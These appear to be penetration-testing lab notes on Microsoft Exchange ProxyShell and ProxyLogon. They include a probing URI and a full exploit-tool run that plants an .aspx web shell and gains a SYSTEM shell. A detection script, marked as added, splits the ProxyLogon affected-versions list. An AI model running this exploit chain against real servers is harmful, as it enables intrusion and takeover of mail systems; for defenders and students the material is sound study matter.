Exchange Vulnerabilities
1. ProxyShell
ProxyShell is the collective name for a series of critical Exchange vulnerabilities discovered by security researcher Orange Tsai in early 2021.
ProxyShell is a pre-authentication remote code execution vulnerability: an attacker can access the system as NT AUTHORITY\SYSTEM without knowing any mailbox password.
The researchers found the vulnerability when supplying a mailbox address in the Email parameter of the URI; it is caused by missing input validation in the code. The following URI can be used to verify it:
/autodiscover/autodiscover.json?@academy.htb/mapi/nspi?&Email=autodiscover/autodiscover.json%3f@academy.htb
2. Exchange PowerShell backend privilege escalation and arbitrary file write
Exchange has a dedicated PowerShell module for making configuration changes to the environment. Any user with the appropriate permissions can use this PowerShell module to run mailbox-related commands. Although its functionality is limited, the New-MailboxExportRequest command can be used to write (export) an arbitrary web shell to disk via the -FilePath parameter. Note, however, that the command does not support exporting and importing files in PST format. The following blog post explains in detail how to leverage the Exchange PowerShell module, the deserialization path, communication with the PowerShell remoting endpoint, and the interaction between PowerShell and the WS-Management protocol.
Below, Proxyshell-Exchange by mr-r3bot is used to obtain system access by specifying the administrator's email address:
git clone https://github.com/mr-r3bot/Proxyshell-Exchange
python3 proxyshell.py -u https://10.129.230.42/ -e Administrator@inlanefreight.local
[-] Checking for Proxyshell vulnerability on Exchange Server
[+] Exchange Server is vulnerable to Proxyshell
[-] Getting LegacyDN
[+] Successfully get LegacyDN
[-] Getting User SID
[+] Successfully get User SID
[-] Generating token
[+] Token generated: VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTCFBZG1pbmlzdHJhdG9yQGlubGFuZWZyZWlnaHQubG9jYWxVLVMtMS01LTIxLTEwODI2MzQ4ODYtMzUzODQzMDQ2Mi0zMDE0MTY2ODMwLTUwMEcBAAAABwAAAAxTLTEtNS0zMi01NDRFAAAAAA==
[-] Checking if token is valid or not
[+] Token is valid
PS> get_shell
127.0.0.1 - - [06/Jun/2024 10:36:04] "POST /wsman HTTP/1.1" 200 -
127.0.0.1 - - [06/Jun/2024 10:36:05] "POST /wsman HTTP/1.1" 200 -
127.0.0.1 - - [06/Jun/2024 10:36:05] "POST /wsman HTTP/1.1" 200 -
127.0.0.1 - - [06/Jun/2024 10:36:05] "POST /wsman HTTP/1.1" 200 -
[-] Sending email contains payload with subject id: mrpuhpskaykvbrul
[+] Sent email successfully with subject id: mrpuhpskaykvbrul
[-] Executing command: New-ManagementRoleAssignment -Role "Mailbox Import Export" -User Administrator@inlanefreight.local
127.0.0.1 - - [06/Jun/2024 10:36:06] "POST /wsman HTTP/1.1" 200 -
127.0.0.1 - - [06/Jun/2024 10:36:06] "POST /wsman HTTP/1.1" 200 -
OUTPUT:
Mailbox Import Export-Administrator
ERROR:[-] Executing command: Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest -Confirm:$false
127.0.0.1 - - [06/Jun/2024 10:36:06] "POST /wsman HTTP/1.1" 200 -
127.0.0.1 - - [06/Jun/2024 10:36:07] "POST /wsman HTTP/1.1" 200 -
OUTPUT:ERROR:[-] Executing command: New-MailboxExportRequest -Mailbox Administrator@inlanefreight.local -IncludeFolders "#Drafts#" -FilePath "\\localhost\c$\inetpub\wwwroot\aspnet_client\mrpuhpskaykvbrul.aspx" -ContentFilter "Subject -eq 'mrpuhpskaykvbrul'"
127.0.0.1 - - [06/Jun/2024 10:36:07] "POST /wsman HTTP/1.1" 200 -
127.0.0.1 - - [06/Jun/2024 10:36:07] "POST /wsman HTTP/1.1" 200 -
OUTPUT:
inlanefreight.local/Users/Administrator\MailboxExport
ERROR:
Shell URL: https://10.129.230.42/aspnet_client/mrpuhpskaykvbrul.aspx
Testing shell 0
Testing shell 1
Shell> whoami
nt authority\system
Alternatively, the Metasploit module version can also be used.
3. ProxyLogon
CVE-2021-26855, discovered by Orange Tsai and named ProxyLogon, allows unauthenticated command execution by abusing Exchange's proxy architecture and logon mechanism.
The following versions of Microsoft Exchange are affected:
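A detection-side example added here (not from the original notes or the Proxyshell-Exchange tool) that covers both the path-confusion URI from section 1 and the role-grant/export cmdlets from section 2: it flags IIS requests carrying the autodiscover.json signature and Exchange management-log cmdlets that grant Mailbox Import Export or export a mailbox to a web-served path. The log lines and cmdlet strings are constructed samples, and X-Rps-CAT=PLACEHOLDER stands in for a real token.

```python
import re
from urllib.parse import unquote
# Constructed IIS W3C log lines (not from the original page); fields:
# date time cs-method cs-uri-stem cs-uri-query sc-status
IIS_LOG = """\
2024-06-06 10:36:01 GET /autodiscover/autodiscover.json @academy.htb/mapi/nspi?&Email=autodiscover/autodiscover.json%3f@academy.htb 200
2024-06-06 10:36:04 POST /autodiscover/autodiscover.json @academy.htb/powershell/?X-Rps-CAT=PLACEHOLDER 200
2024-06-06 10:40:00 GET /autodiscover/autodiscover.json Email=user@academy.htb&Protocol=ActiveSync 200
"""
# Constructed cmdlet strings as Exchange cmdlet auditing records them (first two mirror this page, third is benign)
CMDLETS = [
    r'New-ManagementRoleAssignment -Role "Mailbox Import Export" -User Administrator@inlanefreight.local',
    r'New-MailboxExportRequest -Mailbox Administrator@inlanefreight.local -IncludeFolders "#Drafts#" '
    r'-FilePath "\\localhost\c$\inetpub\wwwroot\aspnet_client\mrpuhpskaykvbrul.aspx"',
    r'New-MailboxExportRequest -Mailbox jdoe@inlanefreight.local -FilePath "\\fileserver\exports\jdoe.pst"',
]
# Path-confusion signature: stem /autodiscover/autodiscover.json with a query that
# starts "@<domain>/<backend path>" (forwarded to a backend endpoint the client
# chose); "autodiscover.json?" inside the Email value is the other half of the URI.
SMUGGLED_BACKEND = re.compile(r"^@[^/\s]+/")

def is_proxyshell_request(uri_stem, query):
    if uri_stem.lower() != "/autodiscover/autodiscover.json":
        return False
    decoded = unquote(query).lower()
    return bool(SMUGGLED_BACKEND.match(decoded)) or "autodiscover.json?" in decoded

def scan_iis(log):
    hits = []  # collects 'METHOD stem?query' for each request matching the signature
    for line in log.splitlines():
        parts = line.split()
        if len(parts) < 6:  # skip W3C header and malformed lines
            continue
        method, stem, query = parts[2], parts[3], parts[4]
        query = "" if query == "-" else query  # IIS writes "-" for an empty query
        if is_proxyshell_request(stem, query):
            hits.append(f"{method} {stem}?{query}")
    return hits

FILEPATH = re.compile(r'-FilePath\s+"?([^"\s]+)', re.I)
WEB_EXEC = re.compile(r"\.(aspx?|ashx|asmx|soap|php)$", re.I)

def suspicious_cmdlet(cmd):
    # Returns a reason string if the cmdlet fits the export-to-webroot chain, else None
    verb = cmd.split()[0].lower()
    if verb == "new-managementroleassignment" and "mailbox import export" in cmd.lower():
        return "grants Mailbox Import Export, the prerequisite for New-MailboxExportRequest"
    if verb == "new-mailboxexportrequest":
        m = FILEPATH.search(cmd)
        path = m.group(1) if m else ""
        if WEB_EXEC.search(path) or "wwwroot" in path.lower():
            return "mailbox export written to a web-served path: " + path
    return None
```

Feed real IIS logs to scan_iis and the cmdlet column of the MSExchange Management event log to suspicious_cmdlet; a hit from either function alone is worth triage, and both together in the same time window is the full chain from this page.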
- Exchange Server 2019 < 15.02.0792.010
- Exchange Server 2019 < 15.02.0721.013
- Exchange Server 2016 < 15.01.2106.013
- Exchange Server 2013 < 15.00.1497.012
